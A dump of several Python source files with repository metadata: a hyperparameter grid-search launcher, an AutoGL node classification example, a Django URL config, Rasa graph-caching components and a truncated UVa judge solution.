return [tf.reshape(scores, [-1, num_steps*self._num_labels],
name='reshape_activations')]
| true | true |
f732540c032f69259ef86b76fd0153508799d6e2 | 4,475 | py | Python | scripts/grid_search.py | shamirtowsif/soft_patterns | bd0b3d4cb46e49ad36f39b3a1d6f369da7e8ad6e | [
"MIT"
] | 58 | 2018-05-17T03:48:05.000Z | 2020-12-20T20:39:55.000Z | scripts/grid_search.py | shamirtowsif/soft_patterns | bd0b3d4cb46e49ad36f39b3a1d6f369da7e8ad6e | [
"MIT"
] | 5 | 2018-05-17T01:58:08.000Z | 2020-12-16T18:38:05.000Z | scripts/grid_search.py | shamirtowsif/soft_patterns | bd0b3d4cb46e49ad36f39b3a1d6f369da7e8ad6e | [
"MIT"
] | 10 | 2018-06-08T20:18:20.000Z | 2021-06-06T17:44:38.000Z | #!/usr/bin/env python
import sys
import os
import os.path
import copy
import subprocess
from operator import mul
from random import shuffle
from operator import mul
from functools import reduce
# Candidate dataset directories, indexed by the first CLI argument.
dirs=['stanford_sentiment_binary', 'amazon_reviews', 'ROC_stories', 'stanford_sentiment_binary_100',
      'stanford_sentiment_binary_500', 'stanford_sentiment_binary_1000', 'stanford_sentiment_binary_2500',
      'amazon_reviews_100', 'amazon_reviews_500', 'amazon_reviews_1000', 'amazon_reviews_2500',
      'amazon_reviews_5000', 'amazon_reviews_10000']
n_dirs=len(dirs)
# Base paths for models/resources; WORK deliberately points at $HOME.
WORK = os.environ['HOME']
model_dir = WORK + "/work/soft_patterns/"
resource_dir = WORK + "/resources/"
def main(args):
    """Launch up to <n instances> randomly chosen hyper-parameter configs.

    Args:
        args: argv-style list:
            [prog, dataset-index, grid-file, n-instances,
             gpu (optional), starting-point (optional),
             comma-separated indices to run (optional)].

    Returns:
        -1 on a usage error, otherwise None.
    """
    gpu = None
    starting_point = 0
    indices_to_run = None
    if len(args) < 4:
        print("Usage:", args[0], "<dataset> <file name> <n instsances> <gpu (optional)> <starting point = 0> <specific instances to run>")
        print("Dirs are:")
        for i in range(n_dirs):
            print("{}: {}".format(i, dirs[i]))
        return -1
    elif len(args) > 4:
        gpu = args[4]
        if len(args) > 5:
            starting_point = int(args[5])
        if len(args) > 6:
            # Explicit configuration indices override random sampling.
            indices_to_run = set(int(x) for x in args[6].split(","))
    ddir = dirs[int(args[1])]
    data_dir = resource_dir + "/text_cat/" + ddir
    n_instances = int(args[3])
    file_name = args[2]
    # Run name: dataset + grid-file basename without extension.
    name = ddir + '_' + ".".join(file_name.split("/")[-1].split(".")[:-1])
    # Each line of the grid file is "<flag> <value1> <value2> ...";
    # a flag with no values becomes [flag, ''].
    with open(file_name) as ifh:
        all_args = [l.rstrip().split() for l in ifh]
    all_args = [l if len(l) > 1 else [l[0], ''] for l in all_args]
    # Total number of configurations is the product of per-flag value counts.
    n = reduce(mul, [len(x) - 1 for x in all_args], 1)
    print(all_args)
    print("Got {} different configurations".format(n))
    if indices_to_run is None:
        # Sample n_instances configuration indices uniformly, no replacement.
        candidates = list(range(starting_point, n))
        shuffle(candidates)
        indices_to_run = set(candidates[:n_instances])
    recursive_run_code(all_args, 0, 0, [], data_dir, indices_to_run, name, gpu)
def recursive_run_code(all_args, curr_param_index, curr_index, curr_values, data_dir, indices_to_run, name, gpu):
    """Depth-first enumeration of the cartesian product of parameter values.

    Each complete assignment receives a sequential 1-based index; assignments
    whose index appears in ``indices_to_run`` are executed via ``run_code``.

    Returns:
        The running configuration index, so callers can continue counting.
    """
    if curr_param_index < len(all_args):
        # Branch on every candidate value of the current parameter.
        for option in all_args[curr_param_index][1:]:
            branch_values = copy.deepcopy(curr_values)
            branch_values.append(option)
            curr_index = recursive_run_code(
                all_args, curr_param_index + 1, curr_index, branch_values,
                data_dir, indices_to_run, name, gpu)
        return curr_index
    # Leaf: a full configuration has been assembled.
    curr_index += 1
    if curr_index in indices_to_run:
        run_code(all_args, curr_values, data_dir, name, curr_index, gpu)
    return curr_index
def run_code(all_args, curr_values, data_dir, name, curr_index, gpu):
    """Run soft_patterns.py once with the given parameter assignment.

    On a Stampede2 login node the job is submitted via sbatch; elsewhere it
    is executed directly (optionally pinned to a GPU), with output teed to a
    per-run log file that doubles as a "this run is done" marker.
    """
    # Short git hash identifies the code version in log-file names.
    git_tag = os.popen('git log | head -n 1 | cut -d " " -f2 | cut -b -7').read().rstrip()
    s = name + "." + str(curr_index)
    odir = model_dir + "/output_" + s
    args = ['python', '-u', 'soft_patterns.py', "--td", data_dir + "/train.data", "--tl", data_dir + "/train.labels",
            "--vd", data_dir + "/dev.data", "--vl", data_dir + "/dev.labels",
            "--model_save_dir", odir]
    # Interleave flags with their chosen values, then flatten.
    params = [[all_args[i][0], curr_values[i]] for i in range(len(all_args))]
    params = [item for sublist in params for item in sublist]
    args += params
    HOSTNAME = os.environ.get('HOSTNAME', '')
    cmd = " ".join(args)
    if HOSTNAME.endswith('.stampede2.tacc.utexas.edu'):
        f = gen_cluster_file(s, cmd)
        # BUG FIX: a space is required between the command and the script path
        # (previously ran "sbatch<path>", which always failed).
        os.system('sbatch ' + f)
    else:
        if gpu is not None:
            os.environ['CUDA_VISIBLE_DEVICES'] = gpu
            cmd += ' -g'
        print(cmd)
        of = model_dir + 'logs/' + s + '_' + str(git_tag) + ".out"
        if os.path.isfile(of):
            # Log already exists: this configuration was run before; skip it.
            print("Output file " + of + " found. Continuing")
        else:
            os.system(cmd + " |& tee " + of)
def gen_cluster_file(s, com):
    """Write a SLURM batch script for job *s* that runs command *com*.

    Returns:
        The path of the generated script.

    BUG FIX: the original referenced ``git_tag``, which was never defined in
    this scope (a local of run_code), raising NameError at runtime.  It is now
    computed here with the same command, so log names match run_code's.
    """
    git_tag = os.popen('git log | head -n 1 | cut -d " " -f2 | cut -b -7').read().rstrip()
    f = model_dir + "/runs/" + s
    print("Writing", f)
    with open(f, 'w') as ofh:
        ofh.write("#!/usr/bin/env bash\n")
        ofh.write("#SBATCH -J " + s + "\n")
        ofh.write("#SBATCH -o " + model_dir + "/logs/" + s + '_' + str(git_tag) + ".out\n")
        ofh.write("#SBATCH -p normal\n")  # queue/partition
        ofh.write("#SBATCH -N 1\n")  # one node (not cores)
        ofh.write("#SBATCH -n 1\n")  # one task
        ofh.write("#SBATCH -t 48:00:00\n")  # wall-clock limit
        ofh.write("#SBATCH --mail-user=roysch@cs.washington.edu\n")
        ofh.write("#SBATCH --mail-type=ALL\n")
        ofh.write("#SBATCH -A TG-DBS110003 # project/allocation number;\n")
        ofh.write("source activate torch3\n")
        ofh.write("mpirun " + com + "\n")
    return f
if __name__ == "__main__":
    # Propagate main()'s return value as the process exit status.
    sys.exit(main(sys.argv))
| 31.076389 | 132 | 0.667486 |
import sys
import os
import os.path
import copy
import subprocess
from operator import mul
from random import shuffle
from operator import mul
from functools import reduce
# Candidate dataset directories, indexed by the first CLI argument.
dirs=['stanford_sentiment_binary', 'amazon_reviews', 'ROC_stories', 'stanford_sentiment_binary_100',
      'stanford_sentiment_binary_500', 'stanford_sentiment_binary_1000', 'stanford_sentiment_binary_2500',
      'amazon_reviews_100', 'amazon_reviews_500', 'amazon_reviews_1000', 'amazon_reviews_2500',
      'amazon_reviews_5000', 'amazon_reviews_10000']
n_dirs=len(dirs)
# Base paths for models/resources; WORK deliberately points at $HOME.
WORK = os.environ['HOME']
model_dir = WORK + "/work/soft_patterns/"
resource_dir = WORK + "/resources/"
def main(args):
    """Launch up to <n instances> randomly chosen hyper-parameter configs.

    args is an argv-style list: [prog, dataset-index, grid-file, n-instances,
    gpu (optional), starting-point (optional), indices-to-run (optional)].
    Returns -1 on a usage error, otherwise None.
    """
    gpu = None
    starting_point = 0
    indices_to_run = None
    if len(args) < 4:
        print("Usage:", args[0], "<dataset> <file name> <n instsances> <gpu (optional)> <starting point = 0> <specific instances to run>")
        print("Dirs are:")
        for i in range(n_dirs):
            print("{}: {}".format(i, dirs[i]))
        return -1
    elif len(args) > 4:
        gpu = args[4]
        if len(args) > 5:
            starting_point = int(args[5])
        if len(args) > 6:
            # Explicit configuration indices override random sampling.
            indices_to_run = set([int(x) for x in args[6].split(",")])
    ddir = dirs[int(args[1])]
    data_dir = resource_dir + "/text_cat/" + ddir
    n_instances = int(args[3])
    file_name = args[2]
    name = ddir+'_'+".".join(file_name.split("/")[-1].split(".")[:-1])
    # Each grid-file line is "<flag> <value1> <value2> ..."; a flag with no
    # values becomes [flag, ''].
    with open(file_name) as ifh:
        all_args = [l.rstrip().split() for l in ifh]
    all_args = [l if len(l) > 1 else [l[0], ''] for l in all_args]
    # Total configurations = product of per-flag value counts.
    n = reduce(mul, [len(x)-1 for x in all_args], 1)
    print(all_args)
    print("Got {} different configurations".format(n))
    if indices_to_run is None:
        # Sample n_instances configuration indices uniformly.
        indices_to_run = x = [i for i in range(starting_point, n)]
        shuffle(indices_to_run)
        indices_to_run = set(indices_to_run[:n_instances])
    recursive_run_code(all_args, 0, 0, [], data_dir, indices_to_run, name, gpu)
def recursive_run_code(all_args, curr_param_index, curr_index, curr_values, data_dir, indices_to_run, name, gpu):
    """Depth-first enumeration of the cartesian product of parameter values.

    Each complete assignment receives a sequential 1-based index; assignments
    whose index appears in ``indices_to_run`` are executed via ``run_code``.
    Returns the running index so callers can continue the count.
    """
    if curr_param_index < len(all_args):
        # Branch on every candidate value of the current parameter.
        for option in all_args[curr_param_index][1:]:
            branch_values = copy.deepcopy(curr_values)
            branch_values.append(option)
            curr_index = recursive_run_code(
                all_args, curr_param_index + 1, curr_index, branch_values,
                data_dir, indices_to_run, name, gpu)
        return curr_index
    # Leaf: a full configuration has been assembled.
    curr_index += 1
    if curr_index in indices_to_run:
        run_code(all_args, curr_values, data_dir, name, curr_index, gpu)
    return curr_index
def run_code(all_args, curr_values, data_dir, name, curr_index, gpu):
    """Run soft_patterns.py once with the given parameter assignment.

    On a Stampede2 login node the job is submitted via sbatch; elsewhere it
    is executed directly (optionally pinned to a GPU), with output teed to a
    per-run log file that doubles as a "this run is done" marker.
    """
    # Short git hash identifies the code version in log-file names.
    git_tag = os.popen('git log | head -n 1 | cut -d " " -f2 | cut -b -7').read().rstrip()
    s = name + "." + str(curr_index)
    odir = model_dir + "/output_" + s
    args = ['python', '-u', 'soft_patterns.py', "--td", data_dir + "/train.data", "--tl", data_dir + "/train.labels",
            "--vd", data_dir + "/dev.data", "--vl", data_dir + "/dev.labels",
            "--model_save_dir", odir]
    # Interleave flags with their chosen values, then flatten.
    params = [[all_args[i][0], curr_values[i]] for i in range(len(all_args))]
    params = [item for sublist in params for item in sublist]
    args += params
    HOSTNAME = os.environ.get('HOSTNAME', '')
    cmd = " ".join(args)
    if HOSTNAME.endswith('.stampede2.tacc.utexas.edu'):
        f = gen_cluster_file(s, cmd)
        # BUG FIX: a space is required between the command and the script path
        # (previously ran "sbatch<path>", which always failed).
        os.system('sbatch ' + f)
    else:
        if gpu is not None:
            os.environ['CUDA_VISIBLE_DEVICES'] = gpu
            cmd += ' -g'
        print(cmd)
        of = model_dir + 'logs/' + s + '_' + str(git_tag) + ".out"
        if os.path.isfile(of):
            # Log already exists: this configuration was run before; skip it.
            print("Output file " + of + " found. Continuing")
        else:
            os.system(cmd + " |& tee " + of)
def gen_cluster_file(s, com):
    """Write a SLURM batch script for job *s* that runs command *com*.

    Returns:
        The path of the generated script.

    BUG FIX: the original referenced ``git_tag``, which was never defined in
    this scope (a local of run_code), raising NameError at runtime.  It is now
    computed here with the same command, so log names match run_code's.
    """
    git_tag = os.popen('git log | head -n 1 | cut -d " " -f2 | cut -b -7').read().rstrip()
    f = model_dir + "/runs/" + s
    print("Writing", f)
    with open(f, 'w') as ofh:
        ofh.write("#!/usr/bin/env bash\n")
        ofh.write("#SBATCH -J " + s + "\n")
        ofh.write("#SBATCH -o " + model_dir + "/logs/" + s + '_' + str(git_tag) + ".out\n")
        ofh.write("#SBATCH -p normal\n")  # queue/partition
        ofh.write("#SBATCH -N 1\n")  # one node
        ofh.write("#SBATCH -n 1\n")  # one task
        ofh.write("#SBATCH -t 48:00:00\n")  # wall-clock limit
        ofh.write("#SBATCH --mail-user=roysch@cs.washington.edu\n")
        ofh.write("#SBATCH --mail-type=ALL\n")
        ofh.write("#SBATCH -A TG-DBS110003 # project/allocation number;\n")
        ofh.write("source activate torch3\n")
        ofh.write("mpirun " + com + "\n")
    return f
if __name__ == "__main__":
    # Propagate main()'s return value as the process exit status.
    sys.exit(main(sys.argv))
| true | true |
f732550aa5d382fb0ee404be3464702f9e7a57b7 | 2,722 | py | Python | examples/node_classification.py | dedsec-9/AutoGL | 487f2b2f798b9b1363ad5dc100fb410b12222e06 | [
"MIT"
] | null | null | null | examples/node_classification.py | dedsec-9/AutoGL | 487f2b2f798b9b1363ad5dc100fb410b12222e06 | [
"MIT"
] | null | null | null | examples/node_classification.py | dedsec-9/AutoGL | 487f2b2f798b9b1363ad5dc100fb410b12222e06 | [
"MIT"
] | null | null | null | import yaml
import random
import torch.backends.cudnn
import numpy as np
from autogl.datasets import build_dataset_from_name
from autogl.solver import AutoNodeClassifier
from autogl.module import Acc
from autogl.backend import DependentBackend
if __name__ == "__main__":
    from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
    # CLI: dataset choice, config file, and a few HPO overrides.
    parser = ArgumentParser(
        "auto node classification", formatter_class=ArgumentDefaultsHelpFormatter
    )
    parser.add_argument(
        "--dataset",
        default="cora",
        type=str,
        help="dataset to use",
        choices=[
            "cora",
            "pubmed",
            "citeseer",
            "coauthor_cs",
            "coauthor_physics",
            "amazon_computers",
            "amazon_photo",
        ],
    )
    parser.add_argument(
        "--configs",
        type=str,
        default="../configs/nodeclf_gcn_benchmark_small.yml",
        help="config to use",
    )
    # following arguments will override parameters in the config file
    parser.add_argument("--hpo", type=str, default="tpe", help="hpo methods")
    parser.add_argument(
        "--max_eval", type=int, default=50, help="max hpo evaluation times"
    )
    parser.add_argument("--seed", type=int, default=0, help="random seed")
    parser.add_argument("--device", default=0, type=int, help="GPU device")
    args = parser.parse_args()
    if torch.cuda.is_available():
        torch.cuda.set_device(args.device)
    seed = args.seed
    # set random seed
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed(seed)
        # Deterministic cuDNN for reproducibility (may cost some speed).
        torch.backends.cudnn.deterministic = True
        torch.backends.cudnn.benchmark = False
    dataset = build_dataset_from_name(args.dataset)
    # Label field name differs between the PyG and DGL backends.
    label = dataset[0].nodes.data["y" if DependentBackend.is_pyg() else "label"]
    num_classes = len(np.unique(label.numpy()))
    configs = yaml.load(open(args.configs, "r").read(), Loader=yaml.FullLoader)
    # CLI overrides take precedence over the YAML config.
    configs["hpo"]["name"] = args.hpo
    configs["hpo"]["max_evals"] = args.max_eval
    autoClassifier = AutoNodeClassifier.from_config(configs)
    # train
    if args.dataset in ["cora", "citeseer", "pubmed"]:
        # These datasets ship with standard public splits.
        autoClassifier.fit(dataset, time_limit=3600, evaluation_method=[Acc])
    else:
        # Other datasets need an explicit per-class train/val split.
        autoClassifier.fit(
            dataset,
            time_limit=3600,
            evaluation_method=[Acc],
            seed=seed,
            train_split=20 * num_classes,
            val_split=30 * num_classes,
            balanced=False,
        )
    autoClassifier.get_leaderboard().show()
    acc = autoClassifier.evaluate(metric="acc")
    print("test acc: {:.4f}".format(acc))
| 32.404762 | 81 | 0.64144 | import yaml
import random
import torch.backends.cudnn
import numpy as np
from autogl.datasets import build_dataset_from_name
from autogl.solver import AutoNodeClassifier
from autogl.module import Acc
from autogl.backend import DependentBackend
if __name__ == "__main__":
    from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
    # CLI: dataset choice, config file, and a few HPO overrides.
    parser = ArgumentParser(
        "auto node classification", formatter_class=ArgumentDefaultsHelpFormatter
    )
    parser.add_argument(
        "--dataset",
        default="cora",
        type=str,
        help="dataset to use",
        choices=[
            "cora",
            "pubmed",
            "citeseer",
            "coauthor_cs",
            "coauthor_physics",
            "amazon_computers",
            "amazon_photo",
        ],
    )
    parser.add_argument(
        "--configs",
        type=str,
        default="../configs/nodeclf_gcn_benchmark_small.yml",
        help="config to use",
    )
    # The following arguments override parameters in the config file.
    parser.add_argument("--hpo", type=str, default="tpe", help="hpo methods")
    parser.add_argument(
        "--max_eval", type=int, default=50, help="max hpo evaluation times"
    )
    parser.add_argument("--seed", type=int, default=0, help="random seed")
    parser.add_argument("--device", default=0, type=int, help="GPU device")
    args = parser.parse_args()
    if torch.cuda.is_available():
        torch.cuda.set_device(args.device)
    seed = args.seed
    # Seed all RNGs for reproducibility.
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed(seed)
        # Deterministic cuDNN for reproducibility (may cost some speed).
        torch.backends.cudnn.deterministic = True
        torch.backends.cudnn.benchmark = False
    dataset = build_dataset_from_name(args.dataset)
    # Label field name differs between the PyG and DGL backends.
    label = dataset[0].nodes.data["y" if DependentBackend.is_pyg() else "label"]
    num_classes = len(np.unique(label.numpy()))
    configs = yaml.load(open(args.configs, "r").read(), Loader=yaml.FullLoader)
    # CLI overrides take precedence over the YAML config.
    configs["hpo"]["name"] = args.hpo
    configs["hpo"]["max_evals"] = args.max_eval
    autoClassifier = AutoNodeClassifier.from_config(configs)
    if args.dataset in ["cora", "citeseer", "pubmed"]:
        # These datasets ship with standard public splits.
        autoClassifier.fit(dataset, time_limit=3600, evaluation_method=[Acc])
    else:
        # Other datasets need an explicit per-class train/val split.
        autoClassifier.fit(
            dataset,
            time_limit=3600,
            evaluation_method=[Acc],
            seed=seed,
            train_split=20 * num_classes,
            val_split=30 * num_classes,
            balanced=False,
        )
    autoClassifier.get_leaderboard().show()
    acc = autoClassifier.evaluate(metric="acc")
    print("test acc: {:.4f}".format(acc))
| true | true |
f732557435b6dc4f0046e12a67a471a54ffca701 | 982 | py | Python | mysite/mysite/urls.py | BAXTOR95/blog_project | a167c9f63a33a5075a001de29720a58624fd1636 | [
"MIT"
] | 1 | 2021-03-30T07:51:30.000Z | 2021-03-30T07:51:30.000Z | mysite/mysite/urls.py | BAXTOR95/blog_project | a167c9f63a33a5075a001de29720a58624fd1636 | [
"MIT"
] | null | null | null | mysite/mysite/urls.py | BAXTOR95/blog_project | a167c9f63a33a5075a001de29720a58624fd1636 | [
"MIT"
] | 1 | 2021-01-16T13:48:39.000Z | 2021-01-16T13:48:39.000Z | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views
urlpatterns = [
    path('admin/', admin.site.urls),  # Django admin site
    path('', include('blog.urls')),  # blog app owns the site root
    # NOTE(review): function-based auth views (views.login / views.logout) are
    # deprecated in Django 2.x in favour of LoginView/LogoutView -- confirm
    # the installed Django version before upgrading.
    path('accounts/login/', views.login, name='login'),
    path('accounts/logout/', views.logout,
         name='logout', kwargs={'next_page': '/'}),  # redirect home on logout
]
| 36.37037 | 77 | 0.690428 | from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views
urlpatterns = [
    path('admin/', admin.site.urls),  # Django admin site
    path('', include('blog.urls')),  # blog app owns the site root
    # NOTE(review): function-based auth views (views.login / views.logout) are
    # deprecated in Django 2.x in favour of LoginView/LogoutView -- confirm
    # the installed Django version before upgrading.
    path('accounts/login/', views.login, name='login'),
    path('accounts/logout/', views.logout,
         name='logout', kwargs={'next_page': '/'}),  # redirect home on logout
]
| true | true |
f73255f453208be5b49bcb21a383512d9ef8a752 | 6,524 | py | Python | rasa/engine/training/components.py | Next-Trends/rasa | c06dc26b3a57dd1114b60aebcc9ccd3bbb8308d7 | [
"Apache-2.0"
] | 3,603 | 2017-05-21T18:34:55.000Z | 2019-04-16T11:58:09.000Z | rasa/engine/training/components.py | Next-Trends/rasa | c06dc26b3a57dd1114b60aebcc9ccd3bbb8308d7 | [
"Apache-2.0"
] | 2,782 | 2017-05-21T20:36:15.000Z | 2019-04-16T14:35:20.000Z | rasa/engine/training/components.py | Next-Trends/rasa | c06dc26b3a57dd1114b60aebcc9ccd3bbb8308d7 | [
"Apache-2.0"
] | 1,337 | 2017-05-21T18:10:33.000Z | 2019-04-16T09:14:42.000Z | from __future__ import annotations
from typing import Any, Dict, Optional, Text, Type
import dataclasses
import uuid
from rasa.engine.caching import Cacheable, TrainingCache
from rasa.engine.graph import ExecutionContext, GraphComponent, SchemaNode
from rasa.engine.storage.resource import Resource
from rasa.engine.storage.storage import ModelStorage
from rasa.engine.training import fingerprinting
class PrecomputedValueProvider(GraphComponent):
    """Holds the precomputed value of a `GraphNode` from a previous training.

    The stored value is either restored from the training cache or captured
    from an input node during a fingerprint run.
    """

    def __init__(self, output: Cacheable):
        """Stores the value that later calls to ``get_value`` will return.

        Args:
            output: The precomputed output to return.
        """
        self._output = output

    @classmethod
    def create(
        cls,
        config: Dict[Text, Any],
        model_storage: ModelStorage,
        resource: Resource,
        execution_context: ExecutionContext,
    ) -> PrecomputedValueProvider:
        """Creates instance (see parent class for full docstring)."""
        precomputed = config["output"]
        return cls(output=precomputed)

    def get_value(self) -> Cacheable:
        """Returns the value captured from the previous run."""
        return self._output

    @classmethod
    def replace_schema_node(cls, node: SchemaNode, output: Any) -> None:
        """Rewires ``node`` so it returns ``output`` instead of recomputing it.

        Used when the output of a node from a previous training should be
        reused: the node's component class is swapped for a
        `PrecomputedValueProvider` configured to hand back the given value.

        Args:
            node: The node to update.
            output: Precomputed cached output the provider will return.
        """
        node.constructor_name = cls.create.__name__
        node.fn = cls.get_value.__name__
        node.config = {"output": output}
        node.uses = cls
@dataclasses.dataclass
class FingerprintStatus:
    """Result of a `FingerprintComponent` run, used to prune the graph.

    Attributes:
        output_fingerprint: Fingerprint of the node's output value, if known.
        is_hit: `True` if the node's fingerprint key exists in the cache.
    """

    output_fingerprint: Optional[Text]
    is_hit: bool

    def fingerprint(self) -> Text:
        """Returns the stored fingerprint, or a never-matching random one.

        A fresh random hex string guarantees that a missing fingerprint can
        never compare equal to anything.
        """
        if self.output_fingerprint:
            return self.output_fingerprint
        return uuid.uuid4().hex
class FingerprintComponent(GraphComponent):
    """Replaces non-input nodes during a fingerprint run."""

    def __init__(
        self,
        cache: TrainingCache,
        config_of_replaced_component: Dict[Text, Any],
        class_of_replaced_component: Type,
    ) -> None:
        """Initializes a `FingerprintComponent`.

        Args:
            cache: Training cache used to determine if the run is a hit or not.
            config_of_replaced_component: Needed to generate the fingerprint key.
            class_of_replaced_component: Needed to generate the fingerprint key.
        """
        self._cache = cache
        self._config_of_replaced_component = config_of_replaced_component
        self._class_of_replaced_component = class_of_replaced_component

    @classmethod
    def create(
        cls,
        config: Dict[Text, Any],
        model_storage: ModelStorage,
        resource: Resource,
        execution_context: ExecutionContext,
    ) -> FingerprintComponent:
        """Creates a `FingerprintComponent` (see parent class for full docstring)."""
        return cls(
            cache=config["cache"],
            config_of_replaced_component=config["config_of_replaced_component"],
            class_of_replaced_component=config["graph_component_class"],
        )

    def run(self, **kwargs: Any) -> FingerprintStatus:
        """Calculates the fingerprint key to determine if cached output can be used.

        If the fingerprint key matches an entry in the cache it means that there has
        been a previous node execution which matches the same component class, component
        config and input values. This means that we can potentially prune this node
        from the schema, or replace it with a cached value before the next graph run.

        Args:
            **kwargs: Inputs from all parent nodes.

        Returns:
            A `FingerprintStatus` determining if the run was a hit, and if it was a hit
            also the output fingerprint from the cache.
        """
        fingerprint_key = fingerprinting.calculate_fingerprint_key(
            graph_component_class=self._class_of_replaced_component,
            # Instance config overrides the component's declared defaults.
            config={
                **self._class_of_replaced_component.get_default_config(),
                **self._config_of_replaced_component,
            },
            inputs=kwargs,
        )
        output_fingerprint = self._cache.get_cached_output_fingerprint(fingerprint_key)
        # A non-None fingerprint means the cache has seen this exact run before.
        return FingerprintStatus(
            is_hit=output_fingerprint is not None, output_fingerprint=output_fingerprint
        )

    @classmethod
    def replace_schema_node(cls, node: SchemaNode, cache: TrainingCache) -> None:
        """Updates a `SchemaNode` to use a `FingerprintComponent`.

        This is for when we want to do a fingerprint run. During the fingerprint run we
        replace all non-input nodes with `FingerprintComponent`s so we can determine
        whether they are able to be pruned or cached before the next graph run without
        running the actual components.

        Args:
            node: The node to update.
            cache: The cache is needed to determine of there is cache hit for the
                fingerprint key.
        """
        graph_component_class = node.uses
        node.uses = cls
        # We update the node to be "eager" so that `FingerprintComponent.run` sees
        # ALL the inputs to the node. If it was not eager, we would miss any args used
        # by the constructor.
        node.eager = True
        node.constructor_name = cls.create.__name__
        node.fn = cls.run.__name__
        node.config = {
            "config_of_replaced_component": node.config,
            "cache": cache,
            "graph_component_class": graph_component_class,
        }
| 36.858757 | 88 | 0.667689 | from __future__ import annotations
from typing import Any, Dict, Optional, Text, Type
import dataclasses
import uuid
from rasa.engine.caching import Cacheable, TrainingCache
from rasa.engine.graph import ExecutionContext, GraphComponent, SchemaNode
from rasa.engine.storage.resource import Resource
from rasa.engine.storage.storage import ModelStorage
from rasa.engine.training import fingerprinting
class PrecomputedValueProvider(GraphComponent):
    """Holds the precomputed value of a graph node from a previous training.

    The stored value is either restored from the training cache or captured
    from an input node during a fingerprint run.
    """

    def __init__(self, output: Cacheable):
        """Stores the value that later calls to ``get_value`` will return."""
        self._output = output

    @classmethod
    def create(
        cls,
        config: Dict[Text, Any],
        model_storage: ModelStorage,
        resource: Resource,
        execution_context: ExecutionContext,
    ) -> PrecomputedValueProvider:
        """Creates an instance configured with the precomputed output."""
        return cls(output=config["output"])

    def get_value(self) -> Cacheable:
        """Returns the precomputed output."""
        return self._output

    @classmethod
    def replace_schema_node(cls, node: SchemaNode, output: Any) -> None:
        """Rewires ``node`` so it returns ``output`` instead of recomputing it."""
        node.uses = cls
        node.config = {"output": output}
        node.fn = cls.get_value.__name__
        node.constructor_name = cls.create.__name__
@dataclasses.dataclass
class FingerprintStatus:
    """Result of a `FingerprintComponent` run, used to prune the graph.

    Attributes:
        output_fingerprint: Fingerprint of the node's output value, if known.
        is_hit: `True` if the node's fingerprint key exists in the cache.
    """

    output_fingerprint: Optional[Text]
    is_hit: bool

    def fingerprint(self) -> Text:
        """Returns the stored fingerprint, or a never-matching random one."""
        if self.output_fingerprint:
            return self.output_fingerprint
        return uuid.uuid4().hex
class FingerprintComponent(GraphComponent):
    """Replaces non-input nodes during a fingerprint run."""

    def __init__(
        self,
        cache: TrainingCache,
        config_of_replaced_component: Dict[Text, Any],
        class_of_replaced_component: Type,
    ) -> None:
        """Initializes with the cache and the replaced component's identity.

        The config and class of the replaced component are needed to build
        the fingerprint key.
        """
        self._cache = cache
        self._config_of_replaced_component = config_of_replaced_component
        self._class_of_replaced_component = class_of_replaced_component

    @classmethod
    def create(
        cls,
        config: Dict[Text, Any],
        model_storage: ModelStorage,
        resource: Resource,
        execution_context: ExecutionContext,
    ) -> FingerprintComponent:
        """Creates a `FingerprintComponent` from its packed config."""
        return cls(
            cache=config["cache"],
            config_of_replaced_component=config["config_of_replaced_component"],
            class_of_replaced_component=config["graph_component_class"],
        )

    def run(self, **kwargs: Any) -> FingerprintStatus:
        """Computes the fingerprint key and reports whether the cache has it.

        Args:
            **kwargs: Inputs from all parent nodes.

        Returns:
            A `FingerprintStatus` with the hit flag and, on a hit, the cached
            output fingerprint.
        """
        fingerprint_key = fingerprinting.calculate_fingerprint_key(
            graph_component_class=self._class_of_replaced_component,
            # Instance config overrides the component's declared defaults.
            config={
                **self._class_of_replaced_component.get_default_config(),
                **self._config_of_replaced_component,
            },
            inputs=kwargs,
        )
        output_fingerprint = self._cache.get_cached_output_fingerprint(fingerprint_key)
        # A non-None fingerprint means the cache has seen this exact run before.
        return FingerprintStatus(
            is_hit=output_fingerprint is not None, output_fingerprint=output_fingerprint
        )

    @classmethod
    def replace_schema_node(cls, node: SchemaNode, cache: TrainingCache) -> None:
        """Rewires ``node`` to run a `FingerprintComponent` instead.

        Done for every non-input node before a fingerprint run, so pruning or
        cache substitution can be decided without running real components.
        """
        graph_component_class = node.uses
        node.uses = cls
        # Eager construction ensures `run` receives ALL node inputs, including
        # any that would otherwise only be consumed by the constructor.
        node.eager = True
        node.constructor_name = cls.create.__name__
        node.fn = cls.run.__name__
        node.config = {
            "config_of_replaced_component": node.config,
            "cache": cache,
            "graph_component_class": graph_component_class,
        }
| true | true |
f732568bc73bb8b78f184a2659fa83180b3c902d | 367 | py | Python | 10420/10420.py | Keilan/uva | 4218328466c3ab2fdf34cdf45fc7a8dea90964bc | [
"MIT"
] | null | null | null | 10420/10420.py | Keilan/uva | 4218328466c3ab2fdf34cdf45fc7a8dea90964bc | [
"MIT"
] | null | null | null | 10420/10420.py | Keilan/uva | 4218328466c3ab2fdf34cdf45fc7a8dea90964bc | [
"MIT"
] | null | null | null | import sys
# Read a count, then tally how many input lines start with each country name
# and print the counts in alphabetical order (UVa judge problem 10420).
n = int(sys.stdin.readline())
countries = {}
for _ in range(n):
    # Only the first whitespace-separated token (the country) matters.
    country = sys.stdin.readline().split()[0]
    #Add to the current value (or 0 if not present)
    countries[country] = countries.get(country, 0) + 1
#Order keys alphabetically
keys = sorted(countries.keys())
for k in keys:
    print('{} {}'.format(k,countries[k]))
| 20.388889 | 55 | 0.623978 | import sys
# Read a count, then tally how many input lines start with each country name
# and print the counts in alphabetical order (UVa judge problem 10420).
n = int(sys.stdin.readline())
countries = {}
for _ in range(n):
